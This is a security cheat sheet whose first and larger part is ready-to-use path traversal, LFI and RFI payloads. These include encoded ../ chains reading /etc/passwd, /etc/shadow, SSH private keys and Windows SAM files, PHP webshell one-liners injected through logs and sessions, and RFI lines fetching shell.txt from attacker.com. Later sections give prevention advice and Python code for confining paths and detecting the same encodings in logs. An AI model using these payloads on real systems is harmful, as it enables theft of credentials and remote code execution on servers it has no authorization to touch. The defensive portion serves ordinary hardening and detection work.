
Path Traversal & LFI/RFI Payloads

Path Traversal (also known as Directory Traversal) lets an attacker read files outside the web root by supplying ../ sequences, or encoded equivalents, in a parameter that the application turns into a file path. LFI (Local File Inclusion) and RFI (Remote File Inclusion) are the inclusion variants: the controlled path reaches an include()/require()-style call, so a local or remote file is not merely read but parsed and executed as code. Most payloads below are written for PHP, where RFI additionally needs allow_url_include=On.

Basic Path Traversal

Linux/Unix

../
../../
../../../
../../../../
../../../../../
../../../../../../
../../../../../../../
../../../../../../../../

..%2f
..%2f..%2f
..%2f..%2f..%2f

..%5c
..%5c..%5c

..\
..\..\
..\..\..\

Common Payloads

../etc/passwd
../../etc/passwd
../../../etc/passwd
../../../../etc/passwd
../../../../../etc/passwd

..%2f..%2f..%2fetc%2fpasswd
..%5c..%5c..%5cetc%5cpasswd

....//....//....//etc/passwd
..../..../..../etc/passwd

/etc/passwd
/var/www/html/../../../etc/passwd

Encoding Techniques

URL Encoding

%2e%2e%2f
%2e%2e/
..%2f
%2e%2e%5c

%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd

Double URL Encoding

%252e%252e%252f
%252e%252e%255c

%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd

16-Bit Unicode Encoding

# %uXXXX form decoded by IIS; most other servers leave it untouched
%u002e%u002e%u002f
%u002e%u002e%u005c

UTF-8 Unicode Encoding (overlong forms)

# %c0%af is the 2-byte overlong encoding of "/", %c1%9c of "\" and %c0%ae of "." (the classic IIS
# Unicode traversal bug); a strict decoder rejects them, a lenient one yields the ASCII character
..%c0%af
..%c1%9c
..%c0%2f
..%c0%5c

..%c0%af..%c0%af..%c0%afetc/passwd

Overlong UTF-8

# 3-byte forms: %e0%80%ae = "." and %e0%80%af = "/"
..%e0%40%ae
..%e0%80%ae
..%e0%80%af
..%c0%ae

Null Byte Injection

# Terminates the path in the underlying C string, dropping an appended suffix such as .php or .jpg.
# PHP < 5.3.4 only; later versions reject paths that contain a null byte
../../etc/passwd%00
../../../etc/passwd%00.jpg
../../../../etc/passwd%00.png

# raw-byte notation for non-URL contexts (form fields, JSON, sockets)
../../etc/passwd\x00
../../../etc/passwd\0

LFI (Local File Inclusion)

Basic LFI

index.php?page=../../../etc/passwd
index.php?file=../../../../../../etc/passwd
index.php?inc=../../../../var/log/apache2/access.log

Bypassing Filters

# If an extension is appended (.php): null byte terminates the path, PHP < 5.3.4 only
?page=../../../etc/passwd%00
?page=../../../etc/passwd\0

# If "../" is stripped in a single pass: the characters left behind re-form "../"
?page=....//....//....//etc/passwd
?page=..././..././..././etc/passwd

# If the check runs on the raw value before URL decoding, or absolute paths are not rejected
?page=....\/....\/....\/etc/passwd
?page=/etc/passwd
?page=/var/www/../../etc/passwd

Log Poisoning

# Apache/Nginx access log; the web server user must be able to read it (Debian/Ubuntu keep
# Apache logs root:adm 0640, so this often fails there)
?page=../../../var/log/apache2/access.log
?page=../../../var/log/nginx/access.log

# Inject PHP code via the User-Agent or another logged header (send it raw, e.g. curl -A, not
# URL-encoded); it runs only when the log is pulled in by include()/require(), and a syntax
# error in the poisoned line makes every later include of that log fail
User-Agent: <?php system($_GET['cmd']); ?>

# SSH log poisoning: a failed login for a non-existent user writes "Invalid user <name> from <ip>" to auth.log
?page=../../../var/log/auth.log
# SSH login: ssh '<?php system($_GET["cmd"]); ?>'@target

Session File Inclusion

# PHP session files; the directory is session.save_path (Debian/Ubuntu: /var/lib/php/sessions, PHP default: /tmp)
?page=../../../var/lib/php/sessions/sess_[PHPSESSID]
?page=/tmp/sess_[PHPSESSID]

# Poison a session variable: any input the application stores in $_SESSION (a username field, a
# language choice) is written to the file in serialized form and runs as PHP when the file is included
$_SESSION['username'] = '<?php system($_GET["cmd"]); ?>'

Proc Filesystem (Linux)

# /proc/self is the web server (or PHP-FPM) process doing the include; environ shows the
# environment it started with, so request headers reach it only under CGI-style execution
?page=../../../proc/self/environ
?page=../../../proc/self/cmdline
?page=../../../proc/self/stat
# open file descriptors: log files and sockets held by the server process
?page=/proc/self/fd/[0-255]
?page=/proc/self/mem

RFI (Remote File Inclusion)

Basic RFI

# Requires allow_url_include=On (Off by default since PHP 5.2) as well as allow_url_fopen;
# host the payload as .txt so the attacker's own server serves it as text instead of executing it
?page=http://attacker.com/shell.txt
?page=http://attacker.com/shell.php
?page=//attacker.com/shell.txt
?page=https://attacker.com/shell.txt
# //host/share/file : on Windows targets this is a UNC path fetched over SMB

Bypassing Restrictions

# If .php is appended: make the suffix part of the query string or fragment of the remote URL
# (%00 only works on PHP < 5.3.4)
?page=http://attacker.com/shell.txt%00
?page=http://attacker.com/shell.txt?
?page=http://attacker.com/shell.txt%23

# Using different protocols (data:// also needs allow_url_include=On)
?page=ftp://attacker.com/shell.txt
?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4=

PHP Wrappers

php://filter

# Base64 encode file content
php://filter/convert.base64-encode/resource=index.php
php://filter/read=convert.base64-encode/resource=../../../etc/passwd
php://filter/convert.base64-encode/resource=config.php

# Read file directly
php://filter/resource=index.php

php://input

# The PHP code travels in the POST body; requires allow_url_include=On
?page=php://input
# POST body: <?php system($_GET['cmd']); ?>

data://

# Inline code; requires allow_url_include=On. The base64 string decodes to <?php system($_GET['cmd']);?>
?page=data://text/plain,<?php system($_GET['cmd']); ?>
?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4=

expect://

# Requires the PECL expect extension, which is not part of a default PHP install
?page=expect://whoami
?page=expect://id
?page=expect://ls

zip://

# Upload a ZIP archive that contains shell.php, saved under any extension the upload filter
# accepts; %23 is the "#" that separates the archive path from the member name
?page=zip://uploads/file.zip%23shell
?page=zip://uploads/file.jpg%23shell.php

phar://

# Works on any valid phar (phar, tar or zip format) whatever its extension, since the wrapper is named explicitly
?page=phar://uploads/file.jpg/shell.php
?page=phar://./uploads/file.zip/shell.php

Platform-Specific Files

Linux/Unix Files

/etc/passwd
/etc/shadow
/etc/group
/etc/hosts
/etc/hostname
/etc/issue
/etc/motd
/etc/mysql/my.cnf
/etc/apache2/apache2.conf
/etc/nginx/nginx.conf
/etc/ssh/sshd_config
/etc/ssh/ssh_config
/root/.ssh/id_rsa
/root/.ssh/authorized_keys
/root/.bash_history
/home/user/.bash_history
/home/user/.ssh/id_rsa
/var/log/apache2/access.log
/var/log/nginx/access.log
/var/log/auth.log
/var/log/syslog
/var/www/html/index.php
/var/www/html/config.php
/proc/self/environ
/proc/self/cmdline
/proc/version
/proc/net/tcp
/proc/net/fib_trie

Windows Files

C:\Windows\System32\drivers\etc\hosts
C:\Windows\win.ini
C:\Windows\System32\config\SAM
C:\Windows\System32\config\SYSTEM
C:\Windows\System32\config\SECURITY
C:\Windows\repair\SAM
C:\Windows\repair\SYSTEM
C:\Windows\repair\SECURITY
C:\Windows\System32\config\RegBack\SAM
C:\Windows\System32\config\RegBack\SYSTEM
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattended.xml
C:\inetpub\wwwroot\web.config
C:\xampp\apache\conf\httpd.conf
C:\xampp\mysql\bin\my.ini
C:\Program Files\Apache Group\Apache\conf\httpd.conf
C:\Program Files\Apache Group\Apache2\conf\httpd.conf
C:\Users\Administrator\Desktop\
C:\Users\Administrator\Documents\

Web Application Files

# Configuration files
config.php
config.ini
database.php
db.php
settings.php
wp-config.php
configuration.php

# Backup files
index.php.bak
config.php.backup
config.php~
.htaccess.bak

Advanced Techniques

Null Byte Bypass

# PHP < 5.3.4 only (later versions reject paths containing a null byte)
?file=../../../etc/passwd%00
?file=../../../etc/passwd\x00
?file=../../../etc/passwd%00.jpg

Path Truncation

# Older PHP releases truncated file paths at MAXPATHLEN (4096 bytes), so padding the path past
# that limit drops an appended suffix such as .php; the /. segments disappear when the path is resolved
?file=../../../etc/passwd/./././././[repeat many times]

Dot Segment Bypass

?file=..%2f..%2f..%2fetc/passwd
?file=..%5c..%5c..%5cetc/passwd
?file=....//....//....//etc/passwd
# ..;/ : Tomcat treats ";..." as a path parameter and strips it, so a reverse proxy and the backend resolve the path differently
?file=..;/..;/..;/etc/passwd

Filter Bypass

# If ../ is removed
....//....//....//etc/passwd
..../..../..../etc/passwd
..\\..\\..\\/etc/passwd

# If / is blacklisted
..\..\..\etc\passwd
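
Why the "....//" payloads work, and what a check that survives them looks like, as an added example (Python; not code from this page or from any project): naive_strip is the single-pass filter those payloads target, passes_naive_filter is the raw-string check that "..%2f" slips past, and confine is the decode, canonicalise, then prefix-check routine that a file-serving endpoint should use instead. WEB_ROOT is an assumed document root and the path handling is POSIX-oriented.

```python
import os
from urllib.parse import unquote

WEB_ROOT = "/var/www/html"      # assumed document root for the example; any directory works


def naive_strip(path: str) -> str:
    """The weak filter the '....//' payloads target: '../' removed in one pass, so the
    characters around each removed occurrence re-form a new '../'."""
    return path.replace("../", "")


def passes_naive_filter(path: str) -> bool:
    """A raw-string check that runs before URL decoding: '..%2f' contains no '../'."""
    return "../" not in path


def confine(user_path: str, base: str = WEB_ROOT):
    """Decode once, join to base, canonicalise with realpath (symlinks and '..' resolved),
    and require the result to stay under base. Returns the absolute path or None.
    POSIX semantics: a backslash is an ordinary filename character here."""
    decoded = unquote(user_path)
    if "\x00" in decoded:                      # reject null bytes instead of letting a C layer truncate
        return None
    root = os.path.realpath(base)
    # os.path.join discards root when decoded is absolute ('/etc/passwd'); commonpath catches that.
    # Double-encoded input ('..%252f') is decoded once and otherwise treated as a literal name.
    candidate = os.path.realpath(os.path.join(root, decoded))
    if os.path.commonpath([root, candidate]) != root:
        return None
    return candidate


if __name__ == "__main__":
    payloads = ["home.php", "images/../home.php", "../../../etc/passwd",
                "....//....//....//etc/passwd", "..%2f..%2f..%2fetc%2fpasswd",
                "/etc/passwd", "home.php%00.jpg", "..%252f..%252fetc%252fpasswd"]
    for p in payloads:
        # what the naive filter leaves behind vs. what the confined resolver would open
        print(f"{p:32} strip-> {naive_strip(p):24} confine-> {confine(p)}")
```

Note the layering: "....//....//....//etc/passwd" fed straight to confine resolves to a harmless non-existent name under the root, because "...." is not "..". It only becomes a traversal after naive_strip has turned it into "../../../etc/passwd", which confine then rejects. The fix is therefore not a better blacklist but canonicalising first and checking the prefix last.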

Prevention Best Practices

  1. Input Validation: Validate file paths after decoding them, and reject null bytes and absolute paths outright
  2. Whitelist Allowed Files: Map user input to a fixed set of known files; never build a path from raw input
  3. Use Basename: basename($_GET['file']) drops directory components, but still lets the user pick any file in that directory, so combine it with the allow-list
  4. Check Realpath: Resolve the final path with realpath() (which follows symlinks and returns false for missing files) and verify it starts with the intended base directory
  5. Disable allow_url_include: For PHP, keep allow_url_include=Off in php.ini (the default since 5.2) and set open_basedir
  6. Principle of Least Privilege: Run the web server as a dedicated user that cannot read logs, SSH keys or configuration outside the web root
  7. WAF Rules: Detect traversal patterns only after full decoding (double URL encoding, overlong UTF-8, backslashes), otherwise the encodings above walk past the rule
  8. Secure File Operations: Prefer APIs that take an identifier and look the path up server-side over APIs that accept a path
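
The encodings from the Encoding Techniques section and the WAF-rule item above, worked through in one added example (Python; not code from this page or from any WAF product): traversal_variants generates each encoding of a ../ chain, normalize undoes them (repeated percent-decoding, IIS %u, overlong UTF-8, backslash separators) the way a detector must before matching, and flag_log applies the resulting rule to a few constructed Apache log lines. The log lines, client IPs and the 3-byte overlong form are constructed for the example; the sensitive-path list is a starting point, not a complete rule.

```python
import re
from urllib.parse import unquote_to_bytes

TARGET = "etc/passwd"


def pct(s: str, chars: str) -> str:
    """Percent-encode only the characters in `chars` ('.' -> %2e, '/' -> %2f, '%' -> %25)."""
    return "".join(f"%{ord(c):02x}" if c in chars else c for c in s)


def traversal_variants(depth: int = 3, target: str = TARGET) -> dict:
    """Each encoding of a ../ chain from the Encoding Techniques section, keyed by name."""
    raw = "../" * depth + target
    return {
        "plain": raw,
        "url": pct(raw, "/"),                               # ..%2f..%2f..%2fetc%2fpasswd
        "url_full": pct(raw, "./"),                         # %2e%2e%2f...
        "double_url": pct(pct(raw, "./"), "%"),             # %252e%252e%252f...
        "backslash": pct(raw, "/").replace("%2f", "%5c"),   # ..%5c..%5c...
        "iis_u": "%u002e%u002e%u002f" * depth + target,     # IIS %uXXXX form
        "overlong2": "..%c0%af" * depth + target,           # 2-byte overlong "/"
        "overlong3": "..%e0%80%af" * depth + target,        # 3-byte overlong "/" (computed, not from the page)
    }


def lenient_utf8(b: bytes) -> str:
    """Decode UTF-8 like a permissive decoder: overlong sequences such as C0 AF ('/') or
    E0 80 AE ('.') are accepted rather than rejected, which is exactly what the overlong
    payloads rely on. Bytes that do not form a sequence pass through as Latin-1."""
    out, i = [], 0
    while i < len(b):
        c = b[i]
        if c < 0xC0:                                   # ASCII or a stray continuation byte
            out.append(chr(c))
            i += 1
            continue
        k, mask = (3, 0x07) if c >= 0xF0 else (2, 0x0F) if c >= 0xE0 else (1, 0x1F)
        tail = b[i + 1:i + 1 + k]
        if len(tail) == k and all(0x80 <= t <= 0xBF for t in tail):
            cp = c & mask
            for t in tail:
                cp = (cp << 6) | (t & 0x3F)
            out.append(chr(cp) if cp <= 0x10FFFF else "\ufffd")
            i += 1 + k
        else:
            out.append(chr(c))
            i += 1
    return "".join(out)


def normalize(value: str, rounds: int = 3) -> str:
    """Undo the encodings before any check: IIS %uXXXX, percent-decoding repeated until
    stable (defeats double encoding), overlong UTF-8, and backslash separators."""
    for _ in range(rounds):
        step = re.sub(r"%u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), value)
        step = lenient_utf8(unquote_to_bytes(step))
        if step == value:
            break
        value = step
    return value.replace("\\", "/")


# Detection rule evaluated on the normalized request target (path and each query value)
WRAPPERS = re.compile(r"^(php|data|expect|zip|phar)://", re.I)
DOTDOT = re.compile(r"(^|/)\.\.(/|$)")          # '..' as a whole segment; 'a..b.png' is fine
SENSITIVE = ("/etc/passwd", "/etc/shadow", "/proc/self/", "/windows/win.ini", "/windows/system32/")


def is_traversal(target: str) -> bool:
    path, _, query = normalize(target).partition("?")
    path = re.sub(r";[^/]*", "", path)           # Tomcat drops ';param' segments, so '..;/' is '../'
    for part in [path] + re.split(r"[&=]", query):
        if DOTDOT.search(part) or WRAPPERS.match(part):
            return True
        if any(s in part.lower() for s in SENSITIVE):
            return True
    return False


# Constructed Apache combined-format lines for the example, not real traffic
LOG_LINES = [
    '10.0.0.5 - - [12/Mar/2024:10:01:13 +0000] "GET /index.php?page=home.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [12/Mar/2024:10:01:20 +0000] "GET /index.php?page=%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 1843 "-" "curl/8.4.0"',
    '10.0.0.9 - - [12/Mar/2024:10:01:25 +0000] "GET /index.php?page=..%c0%af..%c0%af..%c0%afetc/passwd HTTP/1.1" 200 1843 "-" "curl/8.4.0"',
    '10.0.0.9 - - [12/Mar/2024:10:01:31 +0000] "GET /index.php?page=php://filter/convert.base64-encode/resource=config.php HTTP/1.1" 200 2210 "-" "curl/8.4.0"',
    '10.0.0.7 - - [12/Mar/2024:10:02:02 +0000] "GET /images/a..b.png HTTP/1.1" 200 9031 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [12/Mar/2024:10:02:40 +0000] "GET /app/..;/..;/manager/html HTTP/1.1" 200 1100 "-" "curl/8.4.0"',
]


def flag_log(lines) -> list:
    """(client_ip, request_target) for every line whose target matches the rule."""
    hits = []
    for line in lines:
        m = re.match(r'(\S+) .*?"[A-Z]+ (\S+) HTTP/', line)
        if m and is_traversal(m.group(2)):
            hits.append((m.group(1), m.group(2)))
    return hits


if __name__ == "__main__":
    for name, v in traversal_variants().items():
        print(f"{name:11} {v:58} -> {normalize(v)}")
    for ip, target in flag_log(LOG_LINES):
        print("ALERT", ip, target)
```

Every variant normalizes to the same "../../../etc/passwd", which is the point of the rule: match on the canonical form, never on the wire bytes. The 200 status on the flagged lines is what you would pivot on in an incident: a traversal that returned 200 with a body size matching /etc/passwd is a confirmed read, not an attempt.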

PHP Example

// Bad
include($_GET['file']);

// Better: strict allow-list of known pages, included from a fixed directory
$allowed_files = ['home.php', 'about.php', 'contact.php'];
$file = basename((string) ($_GET['file'] ?? ''));   // drops directory parts, including ../
if (in_array($file, $allowed_files, true)) {          // strict comparison, no type juggling
    include __DIR__ . '/' . $file;                    // path built from a constant, not from input
} else {
    http_response_code(404);
}

Testing Tools

  • dotdotpwn - Path traversal fuzzer
  • Fimap - LFI/RFI scanner
  • Burp Suite - Manual testing
  • OWASP ZAP - Automated scanner
  • Kadimus - LFI/RFI exploitation tool

⚠️ Warning: These payloads are for educational and authorized security testing purposes only. Unauthorized use is illegal.